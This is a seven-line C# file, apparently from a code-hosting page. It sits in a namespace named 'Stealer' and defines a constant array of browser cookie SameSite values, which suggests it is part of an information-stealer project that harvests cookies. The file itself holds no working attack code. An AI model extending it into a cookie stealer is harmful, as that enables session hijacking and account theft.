2023-07-29 23:37:10 +05:30

7 lines
139 B
C#

namespace Stealer;
public class Consts
{
public static string[] SAMESITES = new string[3] { "lax", "strict", "no_restriction" };
}